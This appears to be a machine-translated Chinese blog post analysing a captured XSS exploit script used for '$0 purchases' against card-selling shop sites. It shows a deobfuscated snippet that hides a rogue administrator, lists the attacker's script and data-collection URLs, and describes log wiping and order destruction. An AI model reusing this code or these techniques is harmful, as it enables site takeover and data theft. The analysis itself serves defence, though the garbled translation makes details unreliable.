MJJ Hairpin Navigation MJJ Hairpin Navigation

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1

point of special interest 1年前 (2023) mjjfaka
5,536 0
The adverts are great too.

foreword

The reason for the recent increasing intensity of zero-dollar purchases targeting heterodyne is that the authors did not protect their websites properly. According to enthusiastic netizens as well as their own captured vulnerability exploit script, hereby writing analysis article series. The author of this article vulnerability script, the use of avatar injection xss code, and then use the administrator's fear of being hacked to view the background logs of the psychological, designed to execute malicious code at this time, so as to achieve the use of the administrator's authority to achieve the purpose of zero purchase.

The reason for the recent increasing intensity of zero-dollar purchases targeting heterodyne is that the authors did not protect their websites properly. Based on enthusiastic netizens as well as their own captured vulnerability exploit scripts, we are writing this analysis article series.
There's one thing to be said for not being afraid of being hacked as long as you have zero daily income and no cards.
Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1

hereby declare

To prevent further malicious exploitation, all code and descriptions in this post have been blurred.

outlined

This article vulnerability script author, the use of avatar injection xss code, and then use the administrator's fear of being hacked to view the background logs of the psychology, the design of malicious code at this time to execute, so as to achieve the use of the administrator's authority to achieve the purpose of zero purchase.

code dissection

Malicious code script address

https://jiaoben.keeta1.top/

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
Downloaded it and found it was obfuscated, a simple de-obfuscation.
The process is not shown, the following code is only decrypted to a readable level to prevent exploitation.
The general structure is as follows

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1

Start by adding an administrator with @admina.com
Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1

$("td")["each"](function (_0x36ba71, _0x348775) {
	console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
  if (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
    var _0x53991d = $(this)["parent"]();
    _0x53991d["remove"]().
  }
})

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
The idea is to iterate through all the tables and if a table is found to have a value containing @admina.com, remove its parent element.
It just so happens that the list of administrators is a table, so that the administrator containing @admina.com can be hidden. This means that the administrator is not visible in the backend at all, but only in the database.

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
After running the results as above, the management is gone.
The only drawback is that the bottom line, "Show records 1 to 1, total 1 records", should be reduced by one. Otherwise it's not working.
And then there's the key hacker function.
Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
First of all, according to the title to determine whether the background operation log interface
A timer will then be enabled to execute the malicious code.
The malicious code in the timer will not be executed if it is not in the logging operator interface in the background.

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
First request the card to find the id of the user with the username toptoones
Then, based on the returned id, do the following

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
Delete this user first
Then call the order destruction plugin to destroy this user's order

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
If you do not have this plugin installed, this old 6 will also be thoughtful to call the api to help you download from the plugin shop, activate the plugin, destroy the order, close the plugin, uninstall the plugin, and by the way to help you clear the background logs.

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
Then it will inject the code from the admin avatar where it says at the beginning which hides the malicious admin, so that as soon as you log into the backend the malicious code will be triggered.
It will then upload your information to his backend.

https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
Then it will check if there is an easy payment plugin in the backend and inject code if there is. I guess I should have tried to change the payment configuration, but didn't for some reason, and will probably follow up with an upgrade.

Script Analysis for the Exploitation of the Bizarre Hairpin $0 Purchase Vulnerability-1
It also handles the background guarding with care
Finally, there's all sorts of clearing logs and transferring data.

summaries

waiverfantasise(Interdimensional)
see the reality
Get a different hairbrush, the author didn't even show up.

The adverts are great too.
版权声明:mjjfaka 发表于 2023-12-22 13:26:47.
转载请注明:Bizarre hair card 0 yuan purchase vulnerability exploit script analysis-1 | MJJ hair card navigation
上一篇

没有更多了...

The adverts are great too.